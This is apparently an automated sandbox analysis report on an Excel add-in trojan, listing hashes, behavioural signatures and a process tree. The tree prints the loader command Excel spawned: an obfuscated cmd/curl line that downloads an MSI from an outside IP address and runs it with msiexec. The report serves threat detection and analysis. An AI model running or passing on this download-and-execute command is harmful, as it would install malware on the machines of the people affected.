Analysis

  • max time kernel
    154s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 15:28

General

  • Target

    SecuriteInfo.com.Trojan.Win64.Alien.bzz.28466.xll

  • Size

    12KB

  • MD5

    fdef986e4d89dd1b6038efeaa6f2005c

  • SHA1

    799ec2ec05605ce2c76ab64e70962392331e2de5

  • SHA256

    0b4b8adcb43dfcca9235052fce94be1a25ff61011309ceb361803b5bf2a1b74a

  • SHA512

    69f3ff7b34ce1916d37e42bd98edf35ea6799d7c56f7594c8d698baa4ca1c1d7c7355b8a7ae94c93bb9599ced664c29e5c65e827b6a5713107de1635e974201e

  • SSDEEP

    192:uU5z9iLjq2pJk+/qcJklyJOEdqLsWGQwrgAh:3z9AbJH/IwJOsl/QwrgC

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Win64.Alien.bzz.28466.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2740
    • \??\c:\windows\system32\cmd.exe
      c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Windows\system32\curl.exe
        curl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0
        3⤵
          PID:2604
        • C:\Windows\system32\timeout.exe
          timeout 10
          3⤵
          • Delays execution with timeout.exe
          PID:876
        • C:\Windows\System32\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3240

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Win64.Alien.bzz.28466.xll

            Filesize

            12KB

            MD5

            fdef986e4d89dd1b6038efeaa6f2005c

            SHA1

            799ec2ec05605ce2c76ab64e70962392331e2de5

            SHA256

            0b4b8adcb43dfcca9235052fce94be1a25ff61011309ceb361803b5bf2a1b74a

            SHA512

            69f3ff7b34ce1916d37e42bd98edf35ea6799d7c56f7594c8d698baa4ca1c1d7c7355b8a7ae94c93bb9599ced664c29e5c65e827b6a5713107de1635e974201e

          • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Win64.Alien.bzz.28466.xll

            Filesize

            12KB

            MD5

            fdef986e4d89dd1b6038efeaa6f2005c

            SHA1

            799ec2ec05605ce2c76ab64e70962392331e2de5

            SHA256

            0b4b8adcb43dfcca9235052fce94be1a25ff61011309ceb361803b5bf2a1b74a

            SHA512

            69f3ff7b34ce1916d37e42bd98edf35ea6799d7c56f7594c8d698baa4ca1c1d7c7355b8a7ae94c93bb9599ced664c29e5c65e827b6a5713107de1635e974201e

          • memory/2740-16-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-19-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-2-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-6-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-5-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-7-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-9-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-8-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-10-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-11-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-12-0x00007FFA75B40000-0x00007FFA75B50000-memory.dmp

            Filesize

            64KB

          • memory/2740-13-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-14-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-15-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-0-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-17-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-4-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-21-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-18-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-20-0x00007FFA75B40000-0x00007FFA75B50000-memory.dmp

            Filesize

            64KB

          • memory/2740-3-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-1-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-25-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-26-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-27-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-44-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-45-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-46-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-47-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-48-0x00007FFA77DF0000-0x00007FFA77E00000-memory.dmp

            Filesize

            64KB

          • memory/2740-50-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-49-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB

          • memory/2740-51-0x00007FFAB7D70000-0x00007FFAB7F65000-memory.dmp

            Filesize

            2.0MB